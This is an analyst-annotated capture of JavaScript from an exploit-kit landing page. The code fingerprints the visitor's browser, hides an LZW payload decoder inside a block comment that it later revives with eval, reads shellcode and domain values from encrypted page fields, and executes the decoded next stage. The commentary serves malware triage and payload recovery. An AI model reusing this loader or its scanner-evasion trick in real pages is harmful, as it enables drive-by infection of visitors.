hxxp://altacomputer.info/TF19
Exploit Kit (Java Webstart)
// Client fingerprinting helper used by this landing page. It classifies the
// visitor's browser, browser version and OS from navigator.userAgent,
// navigator.vendor, navigator.platform and window.opera.
// Every one of those inputs is client-controlled, so an analyst replaying the
// page decides which branch is reached by the profile the client presents.
// NOTE(review): the layout resembles the widely circulated "BrowserDetect"
// user-agent sniffing snippet - confirm before treating it as kit-specific.
var BrowserDetect = {
// Populates this.browser, this.version and this.OS, falling back to the
// literal "unknown" strings when nothing matches.
// Order matters: searchString(dataBrowser) leaves this.versionSearchString set
// for the searchVersion() calls that follow, and the later
// searchString(dataOS) call overwrites it again.
init : function (){
this .browser = this .searchString(this .dataBrowser) || "An unknown browser";
this .version = this .searchVersion(navigator.userAgent) || this .searchVersion(
navigator.appVersion) || "an unknown version";
this .OS = this .searchString(this .dataOS) || "an unknown OS";
}
// Walks the table in order and returns the identity of the first entry that
// matches: either entry.string contains entry.subString, or (when entry.string
// is empty/undefined) entry.prop is truthy. Returns undefined when no entry
// matches.
// Side effect: this.versionSearchString is overwritten for every entry that is
// examined, so after a match it holds that entry's versionSearch (or identity).
, searchString : function (data){
for (var i = 0; i < data.length; i ++ ){
var dataString = data[i].string;
var dataProp = data[i].prop;
this .versionSearchString = data[i].versionSearch || data[i].identity;
if (dataString){
if (dataString.indexOf(data[i].subString) != - 1)return data[i].identity;
}
else if (dataProp)return data[i].identity;
}
}
// Locates this.versionSearchString inside dataString and parses the number that
// follows it. The "+ 1" skips one separator character after the marker.
// Returns undefined when the marker is absent.
, searchVersion : function (dataString){
var index = dataString.indexOf(this .versionSearchString);
if (index == - 1)return ;
return parseFloat(dataString.substring(index + this .versionSearchString.length + 1));
}
// Browser table, evaluated top to bottom; the first matching entry wins, so
// the more specific markers are listed before the generic "Gecko"/"Mozilla" ones.
, dataBrowser : [{
string : navigator.userAgent, subString : "Chrome", identity : "Chrome"
}
, {
string : navigator.userAgent, subString : "OmniWeb", versionSearch : "OmniWeb/",
identity : "OmniWeb"
}
, {
string : navigator.vendor, subString : "Apple", identity : "Safari", versionSearch :
"Version"
}
, {
prop : window.opera, identity : "Opera"
}
, {
string : navigator.vendor, subString : "iCab", identity : "iCab"
}
, {
string : navigator.vendor, subString : "KDE", identity : "Konqueror"
}
, {
string : navigator.userAgent, subString : "Firefox", identity : "Firefox"
}
, {
string : navigator.vendor, subString : "Camino", identity : "Camino"
}
, {
// for newer Netscapes (6+)
string : navigator.userAgent, subString : "Netscape",
identity : "Netscape"
}
, {
string : navigator.userAgent, subString : "MSIE", identity : "Explorer", versionSearch
: "MSIE"
}
, {
string : navigator.userAgent, subString : "Gecko", identity : "Mozilla", versionSearch
: "rv"
}
, {
// for older Netscapes (4-)
string : navigator.userAgent, subString : "Mozilla",
identity : "Netscape", versionSearch : "Mozilla"
}
// OS table, same first-match rule as the browser table.
], dataOS : [{
string : navigator.platform, subString : "Win", identity : "Windows"
}
, {
string : navigator.platform, subString : "Mac", identity : "Mac"
}
, {
string : navigator.userAgent, subString : "iPhone", identity : "iPhone/iPod"
}
, {
string : navigator.platform, subString : "Linux", identity : "Linux"
}
]
}
;
// Run the fingerprint once. Of its three results, only BrowserDetect.browser
// is read by the code visible in this capture.
BrowserDetect.init();
// Decoder parameters, created as implicit globals (no var). The decoder further
// down subtracts OFS from every payload character code and then consumes BITS
// bits from each resulting value.
BITS = 3;
OFS = 103;
// window.moniker is not defined anywhere in this capture. Every call passes a
// status string, so it is presumably a logging/reporting hook supplied by the
// surrounding page - confirm against the full landing page.
window.moniker('detected ' + BrowserDetect.browser);
// Delivery path is selected by the fingerprint result. Both branches end up
// defining window.lzw(VAR_APICRYPT, VAR_GID, VAR_EVALFUNC). They differ only in
// how the decoder is shipped: hidden in a comment (non-Firefox) or as ordinary
// code (Firefox). The commented-out text below mirrors the Firefox branch's
// function body.
if (BrowserDetect.browser != 'Firefox'){
// Non-Firefox path. The entire body of window._lzw is ONE block comment, so the
// function does nothing if called directly; its only purpose is to carry the
// decoder as source text for the bootstrapper that follows. A scanner or
// emulator that discards comments sees an empty function here.
// Static indicator for triage: a function whose body is a single comment,
// combined with a toString() call and removal of the block-comment delimiters.
// Nothing is annotated inside this function because its exact source text is
// what the bootstrapper consumes.
// NOTE(review): several lines inside the comment are broken mid-token (for
// example "ret" / "urn"); that looks like hard-wrapping by the capture tool
// rather than the served text - confirm against the raw HTTP response.
window._lzw = function trololo(VAR_APICRYPT, VAR_GID, VAR_EVALFUNC){
/* window.moniker('lzwfunc entrypoint');
window.GetShellcode = function () { ret
urn VAR_APICRYPT(VAR_GID('meego_sh'), parseInt(VAR_GID('meego_sk'))); }
window.Get
DllStatus = function () { return ('true' == (VAR_APICRYPT(VAR_GID('meego_ds'), parseInt(VA
R_GID('meego_sk'))))); }
window.GetUser = function () { return VAR_APICRYPT(VAR_GI
D('meego_u'), parseInt(VAR_GID('meego_sk'))); }
window.GetDomain = function () { r
eturn VAR_APICRYPT(VAR_GID('meego_d'), parseInt(VAR_GID('meego_sk'))); }
window.mo
niker('BEGINNING TO DECODE, GD = ' + window.GetDomain());
VAR_CODE = VAR_DECODER(n
ull, null);
window.moniker('CODE ' + VAR_CODE);
VAR_EVALFUNC(VAR_CODE);
function VAR_DECODER(VAR_KEY_READY, VAR_BUF) //unzipper
{
//window.
moniker("NEW WELCOME!");
var VAR_DOC = this['document'];
var VAR_ID = VA
R_DOC.getElementsByTagName('input');
// //window.moniker(VAR_ID[1].value);
if (VAR_ID) {
if (!VAR_BUF) {
VAR_BUF = "";
for (VAR_EIDX = 1; V
AR_EIDX < VAR_ID.length; VAR_EIDX += 1) {
if (VAR_ID[VAR_EIDX].id.match(/mechanica
l/)) {
VAR_BUF += VAR_ID[VAR_EIDX].value.split(' ').join('');
}
}
}
window.moniker(VAR_BUF);
}
var ibytes = Array();
for (var i = 0; i < VAR_BUF.length; i++) {
ibytes.push(VAR_BUF.charCodeAt(i)
- OFS);
}
// window.moniker('compressed array /'+ibytes.length);
try {
// Initialise the decompressor
var instream = new InStream(ibytes,
ibytes.length * BITS);
var decompressor = new LZWDecompressor(instream);
var VAR_DECODED_BUF = decompressor.decompress();
// window.moniker('decompressed /
'+VAR_DECODED_BUF.length+"\r\ndomain="+GetDomain()+"\r\n"+VAR_DECODED_BUF);
retur
n VAR_DECODED_BUF;
// var VAR_AA = window;
// VAR_AA['e'+'va
l'](VAR_DECODED_BUF);
}
catch (e) {
window.moniker(e.message);
}
}
// Used to read values represented by a user specified num
ber of bits from
// a 'bytestream' array.
function InStream(bytestream,
bitcount) {
this.bytestream = bytestream;
this.bitcount = bitcount;
this.offset = 0;
this.ReadBit = function () {
var o1 = Math.floor(this.
offset / BITS);
var o2 = this.offset % BITS;
var tmp = this.bytestream[o1]
>> (o2);
this.offset++;
return tmp & 1;
}
this.Read = fu
nction (numBits) {
if ((this.offset + numBits) > this.bitcount)
return nul
l;
// Read LSB -> MSB
var val = 0;
for (var i = 0; i < numBits; +
+i)
val |= this.ReadBit() << i;
return val;
}
}
function LZWDecompressor(instream) {
this.input = instream;
this.icall =
0;
this.DecompressDictionary = function () {
this.revhashtable = new Arr
ay();
this.nextcode = 0;
// Populate table with all possible character co
des.
for (var i = 0; i < 256; ++i) {
this.revhashtable[this.nextcode++] =
String.fromCharCode(i);
}
this.numBits = 9;
this.Size = function
() {
return (this.nextcode);
}
this.Insert = function (str) {
this.revhashtable[this.nextcode++] = str;
// How many bits are we currently
using to represent values?
// Look ahead one value because the decompressor lags
one iteration
// behind the compressor.
var log2 = Math.log(this.nextcode
+ 2) / Math.LN2;
this.numBits = Math.ceil(log2);
return this.numBits;
}
this.LookupIndex = function (idx) {
return this.revhashtable[idx];
}
this.ValSizeInBits = function () {
return this.numBits;
}
}
// LZW decompression algorithm. See http://en.wikipedia.org/wiki/LZW
// Correctly handles the 'anomolous' case of
// character/string/charact
er/string/character (with the same character
// for each character and string for
each string).
this.decompress = function (data, bitcount) {
if (bitcount
== 0)
return "";
var dict = new this.DecompressDictionary();
var
numBits = dict.ValSizeInBits();
var k = this.input.Read(numBits);
var out
put = [String.fromCharCode(k)];
var w = output[0];
var entry = "";
while ((k = this.input.Read(numBits)) != null) {
if (k < dict.nextcode) // is it
in the dictionary?
entry = dict.revhashtable[k]; // Get corresponding string.
else
entry = w + w.charAt(0);
output.push(entry);
numBits =
dict.Insert(w + entry.charAt(0));
w = entry;
}
return output.join
('');
};
} // end of LZWDecompressor
// TEMP
*/ }
;
// Bootstrapper for the non-Firefox path. It turns the comment carried by
// window._lzw back into executable code at runtime:
//   1. serialise window._lzw with toString(),
//   2. delete every block-comment delimiter so the hidden text becomes the
//      function body,
//   3. pass "window.good_lzw = <that source>" to VAR_EVALFUNC,
//   4. call window.good_lzw with the same three arguments.
// VAR_EVALFUNC is supplied by the caller and is not visible in this capture;
// it is handed an assignment statement as a string, so it is presumably an
// eval-style primitive - confirm against the caller.
// The technique depends on the engine returning comments from toString();
// where it does not, step 3 defines an empty function and nothing is decoded.
window.lzw = (function (VAR_APICRYPT, VAR_GID, VAR_EVALFUNC)// bootstrapper
{
// src is an implicit global (no var).
src = window._lzw.toString();
try {
// Removes the delimiters only; the commented text itself is kept verbatim.
src = src.split('/*').join('').split('*/').join('');
window.moniker('src ' + src);
//window.good_lzw =
VAR_EVALFUNC('window.good_lzw = ' + src);
}
catch (eerr){
// Errors are reported through the logging hook and otherwise swallowed.
window.moniker('eerr ' + eerr.message);
}
try {
window.moniker('typeof lzw = ' + (typeof window.good_lzw));
window.good_lzw(VAR_APICRYPT, VAR_GID, VAR_EVALFUNC);
}
catch (exerr){
window.moniker('exerr ' + exerr.message);
}
// alert(src.split('/*').join('').split('*/').join(''));
}
);
}
else {
// Firefox path: the decoder is shipped as ordinary code, with no comment
// indirection.
// NOTE(review): presumably because function serialisation in the targeted
// Firefox versions did not preserve comments, which would defeat the
// bootstrapper used in the other branch - confirm.
// fucking firefox
window.lzw = (function (VAR_APICRYPT, VAR_GID, VAR_EVALFUNC){
window.moniker('lzwfunc entrypoint');
// Four global accessors with one shape: VAR_GID(name) fetches a value by name
// and VAR_APICRYPT(value, key) transforms it, the key being
// parseInt(VAR_GID('meego_sk')). Both helpers are caller-supplied and not
// visible here; presumably VAR_GID reads an element by id and VAR_APICRYPT
// decrypts it - confirm against the caller.
// Names used: meego_sh, meego_ds, meego_u, meego_d, with meego_sk as the key.
// Only GetDomain is called within this capture; the other three are
// presumably consumed by the decoded next stage.
window.GetShellcode = function (){
return VAR_APICRYPT(VAR_GID('meego_sh'), parseInt(VAR_GID('meego_sk')));
}
window.GetDllStatus = function (){
return ('true' == (VAR_APICRYPT(VAR_GID('meego_ds'), parseInt(VAR_GID('meego_sk'
)))));
}
window.GetUser = function (){
return VAR_APICRYPT(VAR_GID('meego_u'), parseInt(VAR_GID('meego_sk')));
}
window.GetDomain = function (){
return VAR_APICRYPT(VAR_GID('meego_d'), parseInt(VAR_GID('meego_sk')));
}
window.moniker('BEGINNING TO DECODE, GD = ' + window.GetDomain());
// Decode the next stage from the page and hand it straight to VAR_EVALFUNC.
// VAR_CODE is an implicit global. If the decoder throws, VAR_DECODER returns
// undefined and that is what gets passed on.
// Analysis note: VAR_DECODER reads only the page's <input> values plus BITS and
// OFS, so the next stage can be recovered by running the decoder alone and
// recording VAR_CODE instead of evaluating it.
VAR_CODE = VAR_DECODER(null, null);
window.moniker('CODE ' + VAR_CODE);
VAR_EVALFUNC(VAR_CODE);
// Collects the encoded payload from the DOM and decompresses it.
// VAR_KEY_READY is never read. VAR_BUF may carry a ready-made buffer; the only
// call in this capture passes null, so the buffer is always built from the page.
function VAR_DECODER(VAR_KEY_READY, VAR_BUF)//unzipper
{
//window.moniker("NEW WELCOME!");
// Invoked as a plain function call, so `this` is presumably the global object
// (no strict-mode directive is visible) and this['document'] is the page document.
var VAR_DOC = this ['document'];
var VAR_ID = VAR_DOC.getElementsByTagName('input');
// //window.moniker(VAR_ID[1].value);
if (VAR_ID){
if (!VAR_BUF){
VAR_BUF = "";
// The payload is spread over <input> elements whose id matches /mechanical/.
// The scan starts at index 1, so the first input is never considered. Spaces
// are stripped from each value before concatenation. VAR_EIDX is an implicit
// global.
for (VAR_EIDX = 1; VAR_EIDX < VAR_ID.length; VAR_EIDX += 1){
if (VAR_ID[VAR_EIDX].id.match(/mechanical/)){
VAR_BUF += VAR_ID[VAR_EIDX].value.split(' ').join('');
}
}
}
window.moniker(VAR_BUF);
}
// Each character becomes one small integer: char code minus OFS.
var ibytes = Array();
for (var i = 0; i < VAR_BUF.length; i ++ ){
ibytes.push(VAR_BUF.charCodeAt(i) - OFS);
}
// window.moniker('compressed array /'+ibytes.length);
try {
// Initialise the decompressor
// Total readable bits = number of characters * BITS.
var instream = new InStream(ibytes, ibytes.length *
BITS);
var decompressor = new LZWDecompressor(instream);
var VAR_DECODED_BUF = decompressor.decompress();
// window.moniker('decompressed /'+VAR_DECODED_BUF.length+"\r\ndomain="+GetDomain()+"\r\n"
+VAR_DECODED_BUF);
return VAR_DECODED_BUF;
// var VAR_AA = window;
// VAR_AA['e'+'val'](VAR_DECODED_BUF);
}
catch (e){
// Failure is only logged; the function then falls through and returns undefined.
window.moniker(e.message);
}
}
// Used to read values represented by a user specified number of bits from
// a 'bytestream' array.
// Only the low BITS bits of each array element are ever addressed: the element
// index is floor(offset / BITS) and the bit position is offset % BITS.
function InStream(bytestream, bitcount){
this .bytestream = bytestream;
this .bitcount = bitcount;
this .offset = 0;
// Returns the next single bit and advances the cursor.
this .ReadBit = function (){
var o1 = Math.floor(this .offset / BITS);
var o2 = this .offset % BITS;
var tmp = this .bytestream[o1] >> (o2);
this .offset++;
return tmp & 1;
}
// Returns the next numBits bits as an integer, or null when fewer than numBits
// bits remain; that null is the end-of-stream signal for decompress().
this .Read = function (numBits){
if ((this .offset + numBits) > this .bitcount)return null;
// Read LSB -> MSB
var val = 0;
for (var i = 0; i < numBits; ++ i)val |= this .ReadBit() << i;
return val;
}
}
// Variable-width LZW decoder reading codes from the given InStream.
// icall is assigned here but not read anywhere in this capture.
function LZWDecompressor(instream){
this .input = instream;
this .icall = 0;
// Code -> string table. Seeded with the 256 single-character strings; the code
// width starts at 9 bits.
this .DecompressDictionary = function (){
this .revhashtable = new Array();
this .nextcode = 0;
// Populate table with all possible character codes.
for (var i = 0; i < 256; ++
i){
this .revhashtable[this .nextcode ++ ] = String.fromCharCode(i);
}
this .numBits = 9;
this .Size = function (){
return (this .nextcode);
}
// Appends an entry and returns the code width to use for the next read.
this .Insert = function (str){
this .revhashtable[this .nextcode ++ ] = str;
// How many bits are we currently using to represent values?
// Look ahead one value because the decompressor lags one iteration
// behind the compressor.
var log2 = Math.log(this .nextcode + 2) / Math.LN2;
this .numBits = Math.ceil(log2);
return this .numBits;
}
this .LookupIndex = function (idx){
return this .revhashtable[idx];
}
this .ValSizeInBits = function (){
return this .numBits;
}
}
// LZW decompression algorithm. See http://en.wikipedia.org/wiki/LZW
// Correctly handles the 'anomolous' case of
// character/string/character/string/character (with the same character
// for each character and string for each string).
// The data parameter is never read, and the only call in this capture passes no
// arguments, so the bitcount == 0 guard does not trigger (undefined == 0 is
// false). Input always comes from this.input.
this .decompress = function (data
, bitcount){
if (bitcount == 0)return "";
var dict = new this .DecompressDictionary();
var numBits = dict.ValSizeInBits();
var k = this .input.Read(numBits);
var output = [String.fromCharCode(k)];
var w = output[0];
var entry = "";
// Read() returns null once the remaining bits cannot fill a whole code.
while ((k = this .input.Read(numBits)) != null){
if (k < dict.nextcode)// is it in the dictionary?
entry = dict.revhashtable[k];
// Get corresponding string.
else entry = w + w.charAt(0);
output.push(entry);
numBits = dict.Insert(w + entry.charAt(0));
w = entry;
}
return output.join('');
}
;
}
// end of LZWDecompressor
// TEMP
}
);
}
// Final status message: by this point window.lzw has been defined by one of
// the two branches above.
window.moniker('decryptor bound');
(repeated 1 time)
// This matches the string the non-Firefox bootstrapper builds
// ("window.good_lzw = " + serialised window._lzw), recorded here as a separate
// evaluated script. The function body is empty: the commented-out decoder did
// not survive serialisation in the environment that produced this capture.
// NOTE(review): presumably the analysis engine drops comments in
// Function.prototype.toString(), so on this path the decoder never ran and the
// next stage was not recorded. Re-run with an engine that preserves function
// source text, or decode the page's <input> values offline - confirm.
window.good_lzw = function trololo(VAR_APICRYPT, VAR_GID, VAR_EVALFUNC){
}